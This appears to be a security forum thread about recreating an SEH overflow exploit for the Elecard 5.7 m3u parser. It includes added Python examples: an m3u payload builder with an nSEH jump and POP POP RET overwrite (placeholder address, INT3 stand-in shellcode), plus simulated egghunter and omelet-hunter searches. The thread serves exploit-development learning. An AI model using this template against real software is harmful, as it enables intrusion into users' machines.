Page 1 of 2 (Results 1 to 10 of 11)

Thread: SEH Exploit and trouble with shellcode


  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    SEH Exploit and trouble with shellcode

    I am just wrapping up the PWB course and decided to practice on an SEH exploit. I took the Elecard 5.7 m3u exploit http://www.exploit-db.com/exploits/16253/ and tried recreating it under XP SP3 and Vista using pvefindaddr (btw thanks for the great paper, sickness). I was able to write my own exploit for both that pops up a calc; I used the nice jseh functionality of pvefindaddr for Vista since everything but the exe is SafeSEH protected.

    I have had trouble trying to get any other payload to work, since the space that seems available is only about 240 bytes. The exploit out there indicates there should be plenty of room for any shellcode; I just can't seem to find it. I've got:

    junk (4 bytes) + nseh + seh + nops(16) + shell(318 bytes) + rest (21000 bytes)

    In the debugger it just repeats this before and after my SEH pointer until the end of the dump:
    junk + nseh + seh + nops + first 220 bytes of shell + 20-30 bytes of rest

    It just gets me stuck in a never-ending loop. I've searched memory and can't find the rest of "rest". I did find about 100 bytes or so 700-800 bytes up from my SEH pointer, which looks like this:

    100 bytes + junk (4 bytes) + nseh + seh + nops(16) + first 220 bytes of shell + 20-30 bytes of rest

    That's where that nasty loop starts. Can anyone give me any pointers on how I might get this working using a large payload (using one that's about 320 bytes)? Those 100 bytes would give me what I want, just not sure how to make use of them.
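    The following is an added example written for this page in Python; it is not the poster's exploit nor the exploit-db one. It builds the exact layout described in the post (junk + nSEH + SEH + NOPs + shellcode + rest) and, optionally, swaps the 21000-byte NOP filler for a unique 4-byte-unit pattern, so that when the debugger shows "20-30 bytes of rest" copied somewhere, you can search for those bytes and tell exactly which slice of "rest" survived the copy. The POP POP RET address, the INT3 sled standing in for the 318-byte payload and the output file name are placeholders, not values from the real Elecard exploit.

```python
import string
import struct

# Added example, not code from the thread.  Layout follows the post:
#   junk(4) + nSEH(4) + SEH(4) + NOPs(16) + shellcode + rest
# Placeholder values (assumptions, not the Elecard 5.7 exploit's real values):
PLACEHOLDER_PPR = 0x41424344          # a SafeSEH-free POP/POP/RET as pvefindaddr would report it
PLACEHOLDER_SHELLCODE = b"\xcc" * 318  # INT3 sled standing in for the 318-byte payload


def cyclic_pattern(length):
    """Return `length` bytes of a non-repeating pattern built from 4-byte units:
    uppercase, lowercase, two digits.  26*26*100 units = 270,400 unique bytes,
    so any aligned 4-byte slice found in a memory dump maps back to one offset.
    """
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for d in range(100):
                out += f"{up}{lo}{d:02d}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, needle):
    """Offset inside `pattern` of some bytes copied out of a debugger dump, or -1."""
    return pattern.find(needle)


def layout(shellcode_len=318, junk_len=4, nop_len=16):
    """File offsets of each field, handy for setting memory breakpoints in the debugger."""
    off = {"junk": 0, "nseh": junk_len, "seh": junk_len + 4, "nops": junk_len + 8}
    off["shellcode"] = off["nops"] + nop_len
    off["rest"] = off["shellcode"] + shellcode_len
    return off


def build_payload(shellcode=PLACEHOLDER_SHELLCODE, ppr_addr=PLACEHOLDER_PPR,
                  rest_len=21000, junk_len=4, nop_len=16, tag_rest=False):
    """Assemble the m3u contents.  With tag_rest=True the filler becomes the cyclic
    pattern so surviving fragments of `rest` can be located with pattern_offset().
    """
    nseh = b"\xeb\x06\x90\x90"          # JMP SHORT +6: hop over the 4-byte handler slot into the NOPs
    seh = struct.pack("<I", ppr_addr)   # overwritten handler = POP POP RET, little-endian
    rest = cyclic_pattern(rest_len) if tag_rest else b"\x90" * rest_len
    return b"A" * junk_len + nseh + seh + b"\x90" * nop_len + shellcode + rest


if __name__ == "__main__":
    data = build_payload(tag_rest=True)
    print("field offsets:", layout())
    # Suppose the debugger shows b"Ab75" next to the truncated copy: that slice came from rest+700.
    rest_start = layout()["rest"]
    print("b'Ab75' came from rest +", pattern_offset(data[rest_start:], b"Ab75"))
    with open("elecard_test.m3u", "wb") as f:   # assumed output name
        f.write(data)
```

    Once the pattern has told you where the surviving 20-30 bytes of "rest" came from, switch `tag_rest` back to `False` (or put the real payload there) for the actual run; the pattern is only a measuring tool.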

  2. #2
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Re: SEH Exploit and trouble with shellcode

    I haven't tried this exploit, but if you look through memory do you see any other areas that have an unbroken block of whatever character you are using to overflow the buffer? For example, if you are using
    Code:
    rest = "\x90"*(21000)
    do you see anywhere in memory with 320 or more consecutive \x90 bytes?

    If so, it may be possible to use some creative jumps to hit this space. Or possibly look into egghunters.

    This topic isn't really directly related to BackTrack, so your thread might get locked by one of the mods. Feel free to PM me if you want some help and I can try to find some time to play with this exploit.
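    As an added example (not from the thread), the two searches this reply suggests, scripted in Python against a constructed memory image rather than a real Elecard dump: find every unbroken run of the filler byte (0x90) long enough to hold the payload, and do what an egghunter does, scan for a 4-byte tag repeated twice and return the address just past it. The base address, the repeating truncated record, the 264-NOP block and the parked payload are all constructed to mirror what the original poster described.

```python
# Added example, not code from the thread.  Memory image and base address are
# constructed for the demo; the record layout copies the poster's description.

BASE = 0x0012E000  # assumption: where the constructed dump "starts"
EGG = b"w00t"      # classic 4-byte tag; an egghunter looks for it twice in a row


def runs_of(mem, value, min_len=1, base=0):
    """All (address, length) runs of `value` in `mem` that are at least `min_len` long."""
    runs = []
    i, n = 0, len(mem)
    while i < n:
        if mem[i] != value:
            i += 1
            continue
        j = i
        while j < n and mem[j] == value:
            j += 1
        if j - i >= min_len:
            runs.append((base + i, j - i))
        i = j
    return runs


def longest_run(mem, value=0x90, base=0):
    """(address, length) of the longest run of `value`, or (-1, 0) if it never occurs."""
    runs = runs_of(mem, value, 1, base)
    return max(runs, key=lambda r: r[1]) if runs else (-1, 0)


def find_egg(mem, egg=EGG, base=0):
    """Address just past the doubled tag, i.e. where an egghunter would jump, or -1."""
    off = mem.find(egg * 2)
    return -1 if off < 0 else base + off + 2 * len(egg)


def build_sample_memory():
    """Constructed dump: three truncated copies of the buffer, one NOP block that is
    too small, and the full payload parked elsewhere behind an egg tag."""
    record = (b"A" * 4                  # junk
              + b"\xeb\x06\x90\x90"     # nseh
              + b"\x44\x33\x22\x11"     # seh (placeholder address)
              + b"\x90" * 16            # nops
              + b"\xcc" * 220           # first 220 bytes of shellcode
              + b"\x90" * 24)           # 20-30 bytes of rest, then the copy stops
    mem = bytearray()
    mem += record * 3
    mem += b"\x00" * 16
    mem += b"\x90" * 264                # close but no cigar for a 320-byte payload
    mem += b"\x00" * 128
    mem += EGG * 2 + b"\xcc" * 320      # the real payload, tagged so a hunter can find it
    mem += b"\x00" * 64
    return bytes(mem), BASE


if __name__ == "__main__":
    mem, base = build_sample_memory()
    addr, length = longest_run(mem, 0x90, base)
    print(f"longest NOP run: {length} bytes at 0x{addr:08x}")
    print("NOP runs >= 320 bytes:", runs_of(mem, 0x90, 320, base))
    print(f"egghunter would land at 0x{find_egg(mem, base=base):08x}")
```

    In the real thing the scan runs over pages of the live process rather than a byte string, and the classic x86 egghunter checks for the tag twice precisely so that the search routine's own copy of the 4 tag bytes does not match itself.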

  3. #3
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Re: SEH Exploit and trouble with shellcode

    Have you tried injecting exactly like this:
    Code:
    rest = "\x90"*(21000-len(header+junk+nseh+seh+nops+sc))

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Re: SEH Exploit and trouble with shellcode

    Thanks.

    pigtail, I just tried that combination with the same results.

    Dudeman, I did search in memory and all I could find was 264 NOPs (close but no cigar) at the top of that repeating pattern I was talking about. I'm new to egg hunters, and I looked into that, but couldn't find a spot where I could fit my shellcode. I'll hit you up with a PM; not sure how to split my shellcode up like that and still make it work.

  5. #5
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Re: SEH Exploit and trouble with shellcode

    I responded via PM with some good links. Let me know how it goes.

  6. #6
    Junior Member pigtail23's Avatar
    Join Date
    Jun 2010
    Location
    black hole
    Posts
    41

    Re: SEH Exploit and trouble with shellcode

    Have you checked your shellcode for badchars?

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Re: SEH Exploit and trouble with shellcode

    Yep, but I don't think the bad chars are the problem; it just gets cut off due to lack of space.

    Dudeman sent me some links from the corelan site that I am reading through right now. Just from what I gathered from a brief read-through, it looks like I need to implement an omelet hunter, but I need to play around with it a little first. Definitely learning a few things with what I thought was going to be a simple SEH exploit to recreate.

  8. #8
    Junior Member
    Join Date
    Jan 2010
    Posts
    35

    Re: SEH Exploit and trouble with shellcode

    Just to follow up, the omelet hunter was the answer, but not without a lot of trial and error. I actually had to modify the omelet hunter code to start its search at the top of the current stack instead of the bottom of the stack, as it defaults to.

    Thanks again to dudeman for the pointers; tried to send you a PM, but private messages seem to be down. Was a great learning experience. Learned a lot of tricks with the debugger and some asm along the way.
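    An added example for the omelet approach raised in the two posts above (not the Corelan omelet code, and not the poster's modified version): a Python model of what an omelet-style hunter does, so the mechanics are visible before you fight them in assembly. The payload is cut into self-describing eggs (marker, index, piece count, length, checksum), the eggs end up scattered in a constructed memory image in reverse order with filler between them, and the hunter scans from a chosen starting offset, validates each egg, and stitches the pieces back together in order. The marker bytes, header format and memory image are this example's own choices.

```python
# Added example, not the thread's omelet code.  TAG, the egg header and the
# memory image are constructed for the demo.

TAG = b"\xf0\x0d\xba"   # assumed 3-byte marker; pick bytes outside the target's bad-char set
HDR_LEN = len(TAG) + 4  # TAG + index + piece count + data length + checksum


def xor_checksum(data):
    c = 0
    for b in data:
        c ^= b
    return c


def split_into_eggs(payload, piece_len):
    """Cut `payload` into eggs of at most `piece_len` data bytes; each egg carries
    everything the hunter needs to place it without seeing the others first."""
    if TAG in payload:
        raise ValueError("marker occurs inside the payload; pick another TAG")
    if not 1 <= piece_len <= 255:
        raise ValueError("piece_len must fit in one byte")
    pieces = [payload[i:i + piece_len] for i in range(0, len(payload), piece_len)]
    if len(pieces) > 255:
        raise ValueError("too many pieces for a one-byte index")
    return [TAG + bytes([idx, len(pieces), len(data), xor_checksum(data)]) + data
            for idx, data in enumerate(pieces)]


def hunt_and_reassemble(mem, start=0):
    """Scan `mem` from offset `start` for eggs; return the rebuilt payload, or None
    if any piece is missing (e.g. because the scan started past it)."""
    found, total = {}, None
    pos = mem.find(TAG, start)
    while pos != -1:
        hdr = mem[pos + len(TAG):pos + HDR_LEN]
        if len(hdr) == 4:
            idx, count, length, csum = hdr
            data = mem[pos + HDR_LEN:pos + HDR_LEN + length]
            # A stray TAG inside junk fails one of these checks and is skipped.
            if count and idx < count and len(data) == length and xor_checksum(data) == csum:
                total = count
                found.setdefault(idx, data)
                if len(found) == total:
                    break
        pos = mem.find(TAG, pos + 1)
    if total is None or len(found) != total:
        return None
    return b"".join(found[i] for i in range(total))


def scatter(eggs, filler=b"\x90" * 40):
    """Constructed memory image: eggs dropped in reverse order with filler and zeros between."""
    mem = bytearray(b"\x00" * 32)
    for egg in reversed(eggs):
        mem += filler + egg + b"\x00" * 8
    return bytes(mem)


if __name__ == "__main__":
    payload = bytes(range(256)) + bytes(range(44))      # constructed 300-byte stand-in payload
    eggs = split_into_eggs(payload, 127)                 # 3 eggs, each fits in a ~240-byte gap
    mem = scatter(eggs)
    print("rebuilt OK:", hunt_and_reassemble(mem) == payload)
    # Start the scan one byte past the first egg in memory and that piece is never seen.
    print("scan started too late:", hunt_and_reassemble(mem, start=mem.find(TAG) + 1))
```

    The `start` argument is the part the poster had to change: a hunter that begins at the wrong end of the address range walks past the only copies of some pieces and never completes. The real hunter also has to read memory a page at a time and test each page before touching it, since a read from an unmapped page would crash the process instead of just returning -1 as `find` does here.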

  9. #9
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Re: SEH Exploit and trouble with shellcode

    Happy to help. I actually tried to send you a pm today to see how it was going but I also saw that pm was down. I was wondering if it was just me but it looks like it isn't. If you don't mind I would like to see how the exploit turned out. I'll send you a pm when they start working again.

  10. #10
    Moderator
    Join Date
    Apr 2007
    Posts
    1,644

    Re: SEH Exploit and trouble with shellcode

    If you want to share the links or pointers, use the forum. It's what it's for. If you want to chat over PM, then there is no need for this thread.
